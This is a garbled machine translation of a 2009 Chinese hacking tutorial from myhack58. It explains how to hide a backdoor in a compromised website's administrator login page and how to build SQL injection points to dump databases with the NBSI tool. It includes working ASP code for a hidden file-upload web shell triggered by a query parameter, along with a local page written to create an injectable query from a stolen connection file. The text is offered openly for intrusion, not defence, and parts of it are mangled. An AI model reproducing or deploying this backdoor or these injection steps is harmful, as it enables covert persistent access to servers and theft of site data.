the web leaving the back door-vulnerability warning-the black bar safety net

ID MYHACK58:62200925166
Type myhack58
Reporter 佚名
Modified 2009-11-01T00:00:00



In the administrator backend login screen to hide our Backdoor, it is relatively safe Because the administrator of the inlet is not often traded, as long as his login screen on our back door just in! Of course, you also can be flexibly inserted into the other file, as long as this file is not a regular swap

  1. From our SHELL found on the administrator portal page
  2. Edit it in the final write on a piece of code to copy the contents to the clipboard code: <%if request. QueryString("action")="comeon" then a=Request. TotalBytes:if a Then b="adodb. stream":Set c=Createobject(b):c. Type=1:c. Open:c. The Write Request. BinaryRead(a):c. Position=0:d=c. Read:e=chrB(1 3)&chrB(1 0):f=Instrb(d,e):g=Instrb(f+1,d,e):set h=Createobject(b):h. Type=1:h. Open:c. Position=f+1:c. Copyto h,g-f-3:h. Position=0:h. type=2:h. CharSet="BIG5":i=h. Readtext:h. close:j=mid(i,InstrRev(i,"\")+1,g):k=Instrb(d,e&e)+4:l=Instrb(k+1,d,leftB(d,f-1))-k-2:h. Type=1:h. Open:c. Position=k-1:c. CopyTo h,l:h.SaveToFile server. mappath(j),2%><form enctype=multipart/form-data method=post><input type=file name=n><input type=submit></form> <%end if%>3. So how are we gonna go find us a back door? The surface is nothing to distinguish this is what we hide the secret of where to copy the contents to the clipboard code: login. asp? action=comeon appears our upload page!

Second, the comparison of the absolute.

Own constructor injection point

By conn. asp informed the database account password later

Their structure, and the other is through the search to see the source code to construct the injection point.

This is also divided into several cases corresponding to different methods

Class A: Is the MDB database that is very simple,directly down under OK

Class B: MSSQL database Has received the website of the database link file,but not the SA permissions

Due to the invasion site and there is no injection vulnerability and so,cannot be injected,but we can locally construct a presence of the injection point of the file,and then use the NBSI go mad sweep,you can obtain the database for more information.

Construction method: First, local erection of the ASP environment,then the new following files:copy the contents to the clipboard code: <!--# include file="conn. asp" - > <% dim rs,strSQL,id set rs=server. createobject("ADODB. recordset") id = request("id") strSQL = "select * from admin where id=" & id 'if not this table,you can build a table and field rs. open strSQL,conn,1,3 rs. close %>note:where the"admin"table must exist,so the premise of the file must start with the database connection!! Done,so simple,other information, let him all of yourself exposed. Open nbsi,a crazy note,what information are out. Second, search through constructor injection point search. asp search page, so the name intended. The main detection of the input box. Copy the contents to the clipboard code: Microsoft OLE DB Provider for ODBC Drivers kui 粇 '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]︽ 1: '%' /search. asp, 5 4 Error, it seems that not the filter, the next we construct the injection point. Pay attention to the operation, view the source file to copy the contents to the clipboard code: <form method=post action="search. asp" >this is a form with post method submitting to the search. asp, the author of the content we view input, <input type="text" size="1 2" We construct such a link. Expressed directly in the URL submitted on the parameters passed to the search. the asp file. Sorry, did not search to the relevant information ! Represents the Find test keywords,test should be the input, the input box is not filtered, so it's content is the presence of injection. I check a look at this link. The error message, so that we constructed out of an injection point, you'll need to put in nbsi inside it to run on ok.

Class C: MSSQL database Has received the website of the database link file DB_OWNER permissions How about, the next differential backup, etc, I'm not the demo, here is mainly about search-type injection. In order to facilitate everyone to understand, I re operating the two sites, the unknown solution. No filtering',we look directly in the source code input to construct the injection point.

<form method="post" action="/search_all. asp"> is submitted to this file. <input type="text" size="1 4" This is the field., the Copy the contents to the clipboard code: <>after construction of the injection point, and then use nbsi to run. Behind the not demo. Also want to tell you that an idea is a lot of admin back-end login where the input box is the same no filtering, sometimes having to look for background password login, and sometimes the Inter can be constructed an injection point, if it is sa permissions, but also with Gordon back?